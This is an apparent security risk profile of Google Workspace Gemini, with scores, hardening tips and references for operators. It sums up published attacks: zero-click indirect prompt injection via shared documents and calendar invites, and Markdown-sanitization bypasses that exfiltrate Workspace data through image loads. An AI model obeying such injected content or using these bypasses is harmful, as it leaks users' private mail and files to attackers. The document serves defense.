Google Workspace Gemini Agent Security Risks

Work Copilot Agents workspace.google.com Tight Operators
AI RISK QUADRANT POSITION DEFENSE CONTROLS (10) ATTACK SURFACE (4.96) EXPOSED GIANTS FORTIFIED LEADERS HUMBLE PROVIDERS TIGHT OPERATORS
AIRQ Score
3.03
Critical
Attack Surface
4.96
Medium
Blast Radius
2.5
Low
Defense Controls
10
Low
About The Agent

Google Workspace Gemini is a cloud-hosted AI copilot embedded across Gmail, Docs, Sheets, Slides, Drive, Calendar, Chat, and Meet that processes user prompts alongside organizational data through Workspace Intelligence. A standalone Gemini app provides cross-app data retrieval while Gemini Spark extends the agent with multi-step task decomposition and background execution in isolated VMs. The key risk surface centers on external data ingestion and output rendering where confirmed indirect prompt injection and Markdown exfiltration bypasses target the input classifier and sanitization layers.

About the AI Risk Quadrant

Tight Operators placement reflects an attack surface elevated by confirmed exploitation penalties on input processing, external data ingestion, and output rendering, combined with a blast radius constrained by user confirmation requirements and the absence of code execution or deployment capabilities. Defense controls include vendor-documented input classifiers, Markdown sanitization, and audit logging, but independent research has bypassed the input guardrails and output sanitization on multiple occasions. Operators inherit a profile where the primary risk is data exposure through injection-to-exfiltration chains rather than host compromise or autonomous action.

1 Key Risks

The most critical security risks an operator inherits when deploying this agent in its documented default configuration. The agent presents elevated input and output risk from confirmed indirect prompt injection and exfiltration bypasses on its default Workspace integration configuration.

Key Input Risks
The agent ingests emails, shared documents, calendar invites, and chat messages authored by external parties where all sources feed the same reasoning context regardless of trust level on the default configuration. Confirmed zero-click indirect prompt injection via shared Google Docs and calendar invite titles grounds this surface [3][4].
Key Execution Risks
The agent executes actions via MCP tool servers for Gmail, Drive, Calendar, Chat, and People enabling agentic tool chaining across Workspace apps. CVE-2026-0628 demonstrated browser extension hijacking of the Gemini Live panel with no documented independent red-team of the MCP boundary [1][6].
Key Action Risks
Workspace Intelligence query responses draw from the full corpus without per-read confirmation, while destructive actions require user approval. The highest-blast-radius scope the agent holds by default is broad OAuth-scoped read access to all emails, documents, and contacts [9].
Key Output Risks
The agent emits formatted text with embedded links in Workspace app outputs where URL sanitization and Safe Browsing integration are documented as default-on. The Buganizer.cc research demonstrated bypass of Markdown sanitization via linkification quirks enabling zero-click data exfiltration to external endpoints [5].
Key Monitoring Risks
The agent generates audit logs in the Admin console with security investigation tool integration, activity rules, and Reporting API access for programmatic SIEM forwarding. Real-time anomaly detection for prompt injection or data exfiltration patterns is not documented as a default capability [11].

2 AIRQ Scores

The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Confirmed exploitation across multiple input and output channels drives the attack surface score while access control boundaries limit blast radius.

AIRQ Metrics

The agent sits in the Tight Operators quadrant where confirmed exploitation elevates the attack surface while access controls constrain blast radius.

Scores derive from per-component evidence evaluation across attack surfaces, blast radius factors, and defense control documentation.

Metric Score Comments
AIRQ Score 3.03 Four confirmed exploitation penalties drive the composite upward while constrained blast radius and present defenses pull it down.
Blast Radius 2.5 / 10 Constrained by absence of code execution and deployment access with user confirmation for destructive actions.
Attack Surface 4.96 / 10 Four surfaces carry evidence penalties from confirmed exploitation via CVE and independent security research.
Defense Controls 10 / 15 Layered defenses documented but input and output guardrails both bypassed in published independent research.

3 Attack Surface

Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. Four of ten surfaces carry evidence penalties from confirmed indirect prompt injection, tool hijacking, and output exfiltration demonstrated by independent researchers.

Attack Surface Metrics

Scores range from 1 for minimal surfaces to 4 for surfaces with confirmed exploitation evidence and active penalties.

Each surface is scored on architectural exposure plus evidence-based penalties from confirmed agent-specific vulnerabilities.

Surface Score Comments
User Input 4 / 4 Indirect prompt injection via shared documents and calendar invites demonstrated zero-click context hijacking from externally authored content [3][4][12][13].
External Data 4 / 4 Workspace Intelligence retrieves emails, documents, and calendar entries from external parties as grounding data without per-source isolation [3][4][9].
Memory 1 / 4 Session-scoped conversation history with no persistent cross-session memory or automated learning loop from usage [9].
Reasoning 2 / 4 Multi-step reasoning constrained to Workspace context with vendor-documented security thought reinforcement during inference [8].
Planning 2 / 4 Gemini Spark introduces multi-step task decomposition with background execution in isolated VMs though not independently red-teamed [9].
Tool Execution 3 / 4 Workspace MCP servers expose 33 tools across five apps enabling agentic chaining where CVE-2026-0628 demonstrated browser-level panel hijacking [1][6].
Orchestration 2 / 4 Gemini Spark extends orchestration with connector-based cross-system integration while the standard side panel operates as a standalone assistant within one user conversation [9].
Inter-Agent 1 / 4 No documented pathway for one Gemini instance to invoke or communicate with another instance in any configuration [9].
Output Processing 3 / 4 Markdown sanitization bypassed via linkification quirks and open redirects enabling zero-click Workspace data exfiltration through image loads [5][9].
Configuration 1 / 4 Admin controls enable or disable Gemini per app and per organizational unit with no auto-loaded project configuration files [9].

The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. All three lethal trifecta components are triggered with high confidence, indicating the agent processes untrusted external content, accesses sensitive organizational data, and has demonstrated output channels capable of exfiltrating bytes outside the trust boundary.

Lethal Trifecta · Complete (3 of 3)

Google Workspace Gemini exhibits all three of these conditions in its documented default configuration:

  • Untrusted input — Workspace Intelligence retrieves content from Gmail threads, Drive files, Calendar entries, and Chat rooms including items authored by external parties, where GeminiJack and SafeBreach Targeted Promptware demonstrated zero-click exploitation from untrusted content [2][3][4].
  • Sensitive data — The agent reads Gmail messages, Calendar events, Drive files, Chat history, and contacts via OAuth-scoped Workspace Intelligence access, where GeminiJack demonstrated searching for documents containing confidential salary information and API keys [3].
  • External egress — Markdown rendering, URL generation, and the ability to draft and send emails via Gemini Spark and MCP tools provide channels to transmit bytes outside the trust boundary, where Buganizer.cc demonstrated exfiltration via linkification bypasses [5].

4 Blast Radius

The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. Blast radius is constrained by the absence of code execution and deployment capabilities with user confirmation required for destructive write operations.

Blast Radius Metrics

Scores reflect what damage the agent can cause after compromise, ranging from 0 for no capability to 4 for unrestricted access.

Each factor measures the scope of potential damage from a compromised agent session across execution, data, and autonomy dimensions.

Factor Score Comments
Code execution 0 / 4 No user-accessible code execution environment; Gemini Spark runs agent tasks in vendor-managed isolated VMs without exposing an interpreter to the user [9].
File system access 1 / 4 Creates and modifies Google Docs, Sheets, and Slides in Drive but no local file system access under normal operation [9].
Network access 2 / 4 Outbound requests through Google infrastructure where crafted output demonstrated data-exfiltrating requests via Markdown image loads [5][14].
Credential access 2 / 4 Broad read access to organizational data including documents that may contain embedded secrets where GeminiJack extracted confidential files [3].
Autonomous action 1 / 4 User confirmation required for destructive actions but Gemini Spark introduces background execution of recurring tasks once initially approved [9].
Deployment access 0 / 4 No deployment, publishing, CI/CD, or infrastructure modification capabilities in any documented configuration [9].

5 Defense Controls

Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Layered defenses are documented and default-on but the input guardrails and output guardrails have both been bypassed by independent security teams.

Defense Controls Metrics

Confidence ~ indicates vendor documentation exists but independent testing has focused on demonstrating specific bypasses rather than comprehensive architectural audit.

Each component is scored on documented presence and effectiveness where independent research has tested the boundaries.

Component Score Comments
Input Guardrails 2 / 3 ML-based prompt injection classifiers and security thought reinforcement deployed but bypassed by SafeBreach and Noma Security [3][4][8].
Execution Isolation 2 / 3 Cloud-hosted multi-tenant with Gemini Spark in isolated VMs behind Agent Gateway enforcing DLP boundaries, operating under FedRAMP High authorization [9][10].
Action Controls 2 / 3 User confirmation for destructive actions with admin controls to disable per app and DLP/IRM restricting data access [7][9].
Output Guardrails 2 / 3 Markdown sanitization and Safe Browsing URL redaction deployed but Buganizer.cc demonstrated bypass via linkification quirks [5][9].
Monitoring 2 / 3 Audit logs in Admin console with security investigation tool, activity rules, BigQuery export, and Reporting API access [11].

6 Hardening Tips

Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Hardening focuses on restricting Workspace Intelligence data sources, limiting MCP tool scope, enforcing DLP policies, and forwarding audit logs to SIEM.

Input Guardrails

Input guardrails intercept adversarial content before it reaches the reasoning loop.

Input Guardrails
  • Policy Restrict Workspace Intelligence data sources to exclude external-facing channels from Gemini retrieval scope — counters zero-click indirect prompt injection.
  • Configuration Configure trust rules for Drive sharing to block Gemini access to documents shared from outside the organization — counters GeminiJack shared document injection.
  • Engineering Deploy secondary content inspection on inbound emails and calendar invites to flag payloads matching prompt injection patterns — counters SafeBreach calendar injection.

Execution Isolation

Execution isolation contains what a compromised agent can do on the host.

Execution Isolation
  • Policy Restrict MCP server tool access to a vetted allowlist of connectors rather than enabling all integrations by default — counters broad tool chaining exposure.
  • Configuration Configure Chrome Enterprise policies to restrict extension installation and block declarativeNetRequests modifications — counters CVE-2026-0628 browser extension hijacking.
  • Engineering Segment Gemini Spark connector access by organizational unit to limit cross-system orchestration scope — counters lateral movement through connectors.

Action Controls

Action controls govern which tools and actions the agent can invoke autonomously.

Action Controls
  • Policy Configure DLP policies with Information Rights Management to restrict which document types Gemini can read based on sensitivity labels — counters broad OAuth access.
  • Configuration Disable Gemini Spark background task execution for organizational units handling sensitive data — counters reduced supervision during autonomous recurring tasks.
  • Engineering Require multi-party approval workflows for Gemini-initiated email sends in high-sensitivity organizational units — counters AI-drafted phishing from compromised context.

Output Guardrails

Output guardrails inspect what the agent sends to other systems and users.

Output Guardrails
  • Policy Enable Chrome Enterprise Premium endpoint DLP to inspect and block exfiltration via rendered links and image loads — counters Markdown linkification bypass.
  • Configuration Configure Workspace DLP rules to detect Gemini responses containing patterns matching internal credential formats — counters data leakage through output channels.
  • Engineering Restrict Gemini output rendering to plain text in high-sensitivity organizational units by disabling rich formatting — counters output-based exfiltration.

Monitoring

Monitoring captures what the agent did and surfaces anomalies for review.

Monitoring
  • Policy Forward Gemini audit logs to the SIEM and configure correlation rules mapping activity events to known attack patterns — counters gap between logging and detection.
  • Configuration Configure activity rules in the security investigation tool to alert on anomalous bulk cross-app data retrieval patterns — counters silent data exfiltration.
  • Engineering Export Gemini interaction logs to BigQuery and run scheduled queries detecting prompt injection indicators in responses — counters absence of real-time detection.

7 References

The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.

Selected Vulnerabilities

  1. CVE-2026-0628 High-severity Chrome Gemini Live panel hijacking via malicious extensions enabling local file access and camera capture without user consent. Patched in Chrome 143.
  2. OECD AI Incident 2024-09-26-e873 Documented AI incident cataloging indirect prompt injection exposure in Google Gemini for Workspace that could manipulate outputs and facilitate phishing attacks.

Selected Research

  1. GeminiJack — Hacking Google Gemini Enterprise Noma Security demonstrated zero-click indirect prompt injection in Gemini Enterprise allowing exfiltration of Gmail Calendar and Drive data through shared documents without user interaction.
  2. Invitation Is All You Need — Hacking Gemini SafeBreach demonstrated Targeted Promptware attacks via Google Calendar invites that hijack Gemini agents to geolocate users and exfiltrate emails. Presented at Black Hat 2025 and DEF CON 33.
  3. Hacking Gemini — A Multi-Layered Approach Security researcher bypassed Gemini Markdown sanitization via linkification quirks and open redirects to exfiltrate Workspace data through automatic image loads. Rewarded via Google AI VRP.
  4. Taming Agentic Browsers — Gemini Live in Chrome Hijacking Palo Alto Unit42 disclosed CVE-2026-0628 showing ordinary Chrome extensions could hijack the Gemini Live panel to access files and camera without user consent.

Vendor Documentation

  1. Indirect Prompt Injections and Layered Defense Strategy for Gemini Google documents multi-layer defense against indirect prompt injection including content classifiers and Markdown sanitization and user confirmation framework.
  2. Mitigating Prompt Injection Attacks with a Layered Defense Strategy Google Security Blog details Gemini 2.5 model hardening and proprietary ML classifiers for malicious prompt detection and Safe Browsing URL redaction across Workspace.
  3. Enterprise Security Controls for Gemini in Google Workspace Google Workspace Blog documents admin-configurable controls including DLP with IRM and trust rules for Drive sharing and endpoint DLP via Chrome Enterprise Premium.
  4. Gemini in Workspace Achieves FedRAMP High Authorization Google confirms FedRAMP High and SOC 1/2/3 and ISO 27001/27017/27018 and ISO 42001 certifications for Gemini in Workspace apps.
  5. Gemini for Workspace Log Events Google documents audit logging for Gemini usage including security investigation tool integration and Reporting API access for programmatic monitoring.

Other Sources

  1. Google Patches Gemini Enterprise Vulnerability Exposing Corporate Data SecurityWeek reports on the GeminiJack vulnerability disclosure by Noma Security and confirms Google patched the architectural weakness in Gemini Enterprise.
  2. Prompt Injection Vulnerability Found in Google Gemini Apps The Register covers SafeBreach disclosure at Black Hat documenting indirect prompt injection via Google Calendar invites achieving email exfiltration through Gemini.
  3. BreachWatch — Hacking Gemini Prompt Injection in Google Workspace Perimeter.net analyzes the bugSWAT Tokyo Markdown exfiltration chain that bypassed Gemini sanitization layers using Google Colab as a bridge.